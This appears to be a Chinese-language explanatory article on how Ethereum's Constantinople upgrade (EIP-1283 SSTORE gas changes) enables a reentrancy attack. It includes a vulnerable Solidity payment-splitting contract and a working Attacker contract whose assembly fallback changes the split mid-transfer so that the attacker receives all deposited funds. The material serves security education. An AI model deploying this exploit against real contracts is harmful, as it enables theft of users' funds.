Constantinople enables new Reentrancy Attack
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| pragma solidity ^0.5.0;
contract PaymentSharer { mapping(uint => uint) splits; mapping(uint => uint) deposits; mapping(uint => address payable) first; mapping(uint => address payable) second;
function init(uint id, address payable _first, address payable _second) public { require(first[id] == address(0) && second[id] == address(0)); require(first[id] == address(0) && second[id] == address(0)); first[id] = _first; second[id] = _second; }
function deposit(uint id) public payable { deposits[id] += msg.value; }
function updateSplit(uint id, uint split) public { require(split <= 100); splits[id] = split; }
function splitFunds(uint id) public { // Here would be: // Signatures that both parties agree with this split
// Split address payable a = first[id]; address payable b = second[id]; uint depo = deposits[id]; deposits[id] = 0;
a.transfer(depo * splits[id] / 100); b.transfer(depo * (100 - splits[id]) / 100); } }
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| pragma solidity ^0.5.0;
import "./PaymentSharer.sol";
contract Attacker { address private victim; address payable owner;
constructor() public { owner = msg.sender; }
function attack(address a) external { victim = a; PaymentSharer x = PaymentSharer(a); x.updateSplit(0, 100); x.splitFunds(0); }
function () payable external { address x = victim; assembly{ mstore(0x80, 0xc3b18fb600000000000000000000000000000000000000000000000000000000) pop(call(10000, x, 0, 0x80, 0x44, 0, 0)) } }
function drain() external { owner.transfer(address(this).balance); } }
- 攻击合约将自己的合约地址(我们简称A)和另外一个由攻击者可控制的地址(我们简称B)设置为PaymentShare的资金分配地址。
- 将PaymentShare的资金分配比例修改为100:0;
- 调用PaymentShare的资金分配函数,启动分配;
- 当PaymentShare将资金transfer给A的时候,会触发合约的匿名函数。其中有两行汇编代码,其基本含义是调用PaymentShare的修改分配比例函数,修改资金分配比例为0:100;
- 合约继续执行,对地址B进行资金分配。本来应该transfer给B 0%的资金,但是因为上一步的操作,变成了继续给B transfer 100%的资金。
粗看上去,这些可能和君士坦丁堡升级没有任何关系。毕竟这里没有涉及任何新的EVM操作符。但是君士坦丁堡升级的一项内容,影响了这里的一个操作。在 EIP1283中,重新规定了SSTORE这个操作符的收费逻辑。在某些情况下,GAS的花费甚至降到了200。
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| mstore(0x80, 0xc3b18fb600000000000000000000000000000000000000000000000000000000) pop(call(10000, x, 0, 0x80, 0x44, 0, 0))